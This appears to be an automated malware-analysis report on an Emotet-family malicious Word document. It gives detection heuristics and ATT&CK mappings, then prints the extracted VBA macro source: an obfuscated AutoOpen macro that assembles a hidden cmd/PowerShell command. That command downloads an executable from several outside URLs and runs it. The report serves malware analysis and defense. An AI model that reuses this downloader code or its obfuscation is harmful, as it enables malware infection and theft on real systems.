MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes the Shell() function. The script attempts to construct and execute a complex command string, likely for downloading and executing a second-stage payload. The ClamAV detection explicitly identifies it as Doc.Downloader.Emotet-6884070-0, strongly suggesting the Emotet family.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6884070-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6884070-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4523 bytes |
SHA-256: 8f135abe046d30425e411997e5ba2dda07bfc358cf98854bfd9d61bb29c829a6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MhLpwtTs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If hHZQmC < 14 Then
IwrKi = "PjTY"
End If
If zozOn = 17 Then
YSrdY = "QESVLG"
End If
If BajwB Or hjUsCP Then
IwWnfm = "JnAMtXBzVwrZUY"
End If
If icFOj < ooLsa Then
BQDHMk = "Ai"
End If
ATuJsIKo (KeyString(dCVjWYWk + QFziwhtl + 6 + 15 + 46 + kNiXXu + uVMJHiU) + hRiCiwh + TVWnRU + KeyString(FPXzIc + pXkGzPNK + 7 + 17 + 53 + UaKBO + KaJJGD) + TwQMj + GTqOMaN + ahQIw + ZmDdIGEz + wPNRUr)
If NZWEij Xor NWBcvO Then
IZNtj = "BhwNtG"
End If
End Sub
Attribute VB_Name = "IjWhFdpObUHT"
Function TwQMj()
BaqWlX = "d /V/C" + """" + "^s^e^t ^x^i" + "R^h=^ ^ ^ " + "^ ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^ ^ ^}^"
zuTiJI = "}^{hc^t^ac}^;^k^a^er" + "^b^;^L^D^l^" + "$^ m^e^t^I" + "^-^e^k^ovn" + "^I^;)^L^D^l^$^ " + "^,^b^En^$("
If HFMcKb <> 14 Then
dKzUa = "CBiBiokPf"
End If
If rZpSm <> fOIuua Then
nrsjqP = "Lfr"
End If
If HdoBj Eqv PBUGU Then
kjGVOY = "dbt"
End If
HThdrMA = "e^l^i^F^d^a^o^ln^w^o" + "^D^.^t^W^Q" + "^$^{^yr^t{)^w^j^" + "m^$ ni^ ^b^En$(" + "^hc^a^erof;^'e^xe"
If YPHFL <= dvKTmJ Then
QSNDC = "Fj"
End If
If QFOHE = 12 Then
sNCJkF = "GpZD"
End If
If btFkic <= vllmD Then
PUGRjH = "kOr"
End If
iBZjdzSiJoA = "^.^'^+^D^b^G^$^" + "+'^\^'^+c^" + "i^l^b^u^p^:vn^e^$^=" + "^L^D^l^$;^'^5^7^2^'^" + " ^=^ ^D^b^G^$^"
Fkjhpp = ";)^'^@^'(^t^il^p^S^." + "^'^W^o^Z^f^l/^m^o" + "c^.^s^ec^ivr^es^a"
aNVcYii = "^t^e^j//^:^p^tt^" + "h^@s^z/^l^p^." + "ce^iw^or^t^s^o^.^"
TwQMj = BaqWlX + zuTiJI + HThdrMA + iBZjdzSiJoA + Fkjhpp + aNVcYii
If aYzSGk >= nKFGN Then
CwXTEi = "ToO"
End If
If wFKIqd <> JQHETh Then
dIrWB = "LOEPl"
End If
If BQSQh > PqbdkJ Then
pzzHJ = "GTj"
End If
If vhzuTp <> 16 Then
hMlqU = "Pq"
End If
End Function
Function GTqOMaN()
YZUFqTXG = "kc^p//^:^p^t^t^" + "h^@^UR^L^y^" + "m^k^u/^moc^.t^av^" + "a^dr^i^h^k^in^k^e" + "t^lu^bna^t^si//^:^p"
If QHioQn = IDBVjW Then
jkVzi = "w"
End If
If zMCRPi < 18 Then
IbbWDN = "SbizA"
End If
If DMtjXq <= arkVjk Then
EqzsGj = "Gfb"
End If
If icrRhY Eqv bmHAz Then
asHkdP = "fbPzhKiiAv"
End If
PpEjwSIVuz = "^t^t^h@^pR^Th^e^We/^" + "m^oc^.^p^s^e^sr^" + "m^e^.^w^w^w//^:^p^" + "t^t^h@^W^j" + "r^o^L^D^z/m^oc^.n^ol"
If CcjbG And 4 Then
IvwkAs = "nivEzTYtDDfM"
End If
If oHJzQ Xor KVJvOw Then
nPbOL = "iidH"
End If
If Uomnk < hSUzq Then
NldbpT = "ApqhPwLPVzYBO"
End If
If QGjOpw = zjRFu Then
YXaUns = "UcUti"
End If
imztKVsIwhF = "^a^b^s^i^l" + "^ic^a^.^w^w^" + "w//^:^p^t^t^h^'^=^w^" + "j^m^$;^tn^e^i^lC^" + "b^e^W^.^t^eN^ "
If lMSww < XAzVRs Then
DqThl = "z"
End If
iJBcBD = "^tc^e^j^b^" + "o^-^w^en=tW^Q" + "^$^ ^l^l^eh" + "^sr^e^w^o^p&&^" + "for /^L %^D" + " ^in (^3^7"
If XKpwz > KAmGrG Then
CMwlaF = "tKVIOoLwVWtU"
End If
Kjbvj = "^4^,^-^1^,^0" + ")^d^o ^s^e^t ^o^3^" + "W=!^o^3^W!!^x^i" + "R^h:~%^D,1!&&"
tGZWDTiw = "^i^f %^D=^=^" + "0 c^a^l^l %^o^" + "3^W:^~^-^3^7^5%" + """" + " "
GTqOMaN = YZUFqTXG + PpEjwSIVuz + imztKVsIwhF + iJBcBD + Kjbvj + tGZWDTiw
If QMXwrH > nGAnC Then
iiwRw = "cjGW"
End If
If vizbz > 4 Then
vZqPa = "wAKuAIWMjni"
End If
If mJfaSn <= fmLwr Then
UoPWz = "LNohhIW"
End If
End Function
Function ahQIw()
If jhjwAI > IzrrhE Then
osFkm = "ElSoAnU"
End If
If MclzJ Or CcvYcL Then
irdhP = "I"
End If
MsXdPdil = ""
ahQIw = MsXdPdil
If wPrzMo And CjsPjn Then
kbuus = "RLhUZJ"
End If
If QZmhWX <> tNkWS Then
iNfvA = "RnUfTpQiT"
End If
If RJaGB Or uoaNcF Then
lssEr = "zFNO"
End If
If Euzdk > HHEqa Then
zAVZv = "c"
End If
If wczRs And 13 Then
RLptq = "ZlUadZpoJXV"
End If
End Function
Attribute VB_Name = "ukDWFBtHoEbIt"
Function ATuJsIKo(ZSYuRBD As String)
Const AYBCO = 868298775 - 868298775
If ILYfDF = iuplPt Then
slPcGw = "rnEKZUcv"
End I
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.